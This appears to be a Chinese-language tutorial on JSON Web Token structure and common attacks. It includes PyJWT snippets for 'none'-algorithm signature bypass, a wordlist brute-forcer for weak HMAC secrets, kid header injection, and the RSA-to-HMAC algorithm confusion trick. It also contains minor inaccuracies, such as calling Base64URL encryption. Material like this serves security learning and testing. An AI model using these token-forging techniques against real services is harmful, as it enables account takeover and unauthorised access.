参考文章
JWT(Json Web Token)认证
Json Web Token 2020 攻击指南
前置知识
Json Web Token。是在完成身份验证之后,服务器生成的一个 JSON 对象并将其加密后返回给用户形如 xxxx.xxxxx.xxxxx 的一串字符
之后,客户端与服务器之间的通信便可依靠该字符串来做身份验证,通常 JWT 存放在 cookie 或者其他请求头中。
JWT 由三部分构成,header(头部,示意签名使用的算法)、payload(载荷,存储有效数据)和 signature(签名,校验数据有效性)
- 头部
通常由形如如下 json 数据经过 Base64URL 加密算法生成
{
"alg": "HS256",
"typ": "JWT"
}
其中,alg 表示后续签名部分使用的加密算法,一般有
| alg | 代表的算法 |
|---|---|
| HS256 | HAMC_HASH-256 |
| HS384 | HAMC_HASH-384 |
| HS512 | HAMC_HASH-512 |
| RS256 | RSASSA_HASH-256 |
| RS384 | RSASSA_HASH-384 |
| RS512 | RSASSA_HASH-512 |
| ES256 | ECDSA_P-256 + HASH-256 |
| ES384 | ECDSA_P-384 + HASH-384 |
| ES512 | ECDSA_P-512 + HASH-512 |
| none | 不使用 |
typ 表示数据类型
其中 Base64URL 算法:数据经过 Base64 加密后将结果中的=去掉,+用-替换,/用_替换
- 载荷
包含需要传递的数据,通常由形如如下 json 数据经过 Base64URL 加密算法生成:
{
"iss": "发行人",
"iat": "发布时间",
"nbf": "有效时间起点",
"exp": "到期时间",
"sub": "主题",
"aud": "用户",
"jti": "JWT ID用于标识该JWT",
"xxxxx": "自定义字段内容"
}
- 签名
该部分是对 头部、载荷 两部分数据通过头部中指定的算法生成哈希结果,用于保数据不会被篡改,一般未经过 Base64URL 加密,可选
比如说,头部中 alg 值为 HS256,则生成前面的算法为:
HMACSHA256( base64UrlEncode(header) + "." + base64UrlEncode(payload),密钥)
JWT 与 cookie、session、token 有什么区别可以看这里
可能存在的问题
签名校验问题
- 后端未对签名 signature 做校验,故可直接篡改载荷 payload 内容,并可一并删除 singature 签名字段来尝试绕过签名校验
- 将 alg 值置为 none,若服务器支持 none 算法,便可绕过签名校验
import jwt
print(jwt.encode({"xxx":"xxx"}, key="", algorithm="none"))
将生成的 jwt 字符串(可删除结尾的.) 替换原有的字符串测试即可
弱密钥暴力破解
当 alg 值为 HMAC 类对称加密算法时,可以针对密钥进行暴力破解
网上的脚本:
import jwt
jwt_json='jwt 数据'
with open('dict.txt',encoding='utf-8') as f: # 传入字典
for line in f:
key = line.strip()
try:
jwt.decode(jwt_json,verify=True,key=key,algorithm='HS256') # 指定对称加密算法
print('found key! --> ' + key)
break
except(jwt.exceptions.ExpiredSignatureError, jwt.exceptions.InvalidAudienceError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.ImmatureSignatureError):
print('found key! --> ' + key)
break
except(jwt.exceptions.InvalidSignatureError):
print('verify key! -->' + key)
continue
else:
print("key not found!")
kid 指定攻击
kid 即为 key ID ,存在于 jwt header 头部中,是一个可选的字段,用来指定加密算法的密钥
{
"alg": "HS256",
"typ": "JWT",
"kid": "xxx"
}
通过在头部注入新的 kid 字段,并指定 HS256 算法的 key 密钥为 xxx,生成新的 jwt 数据
import jwt
jwt.encode({"xxx":"xxx"},key="xxx",algorithm='HS256',headers={"kid":"xxx"})
若服务器并未对 header 头部做限制,那么程序将会按照 header 中指定的密钥进行校验,从而通过签名校验
非对称加密算法转对称加密算法
当 header 头部指定签名算法为 RSA 非对称加密算法时,可以替换为 HMAC 对称加密算法,并且通过获取到的公钥重新做签名
服务器在签名校验时便可能会使用公钥做校验